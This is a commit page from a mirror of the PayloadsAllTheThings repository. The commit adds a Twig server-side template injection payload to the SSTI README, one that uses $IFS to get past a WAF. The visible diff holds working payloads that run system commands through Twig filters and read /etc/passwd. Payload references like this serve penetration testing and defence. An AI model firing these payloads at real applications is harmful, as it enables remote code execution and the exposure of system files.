ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added IFS (WAF bypass) to Symfony Twig RCE

Browse Source
This commit is contained in:
SakiiR SakiiR 2020-03-29 23:23:26 +02:00
parent 8b78c2fe71
commit 38c273ff00
1 changed files with 1 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
Server Side Template Injection/README.md
View File

@ -159,6 +159,7 @@ $output = $twig > render (
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
```
Example with an email passing FILTER_VALIDATE_EMAIL PHP.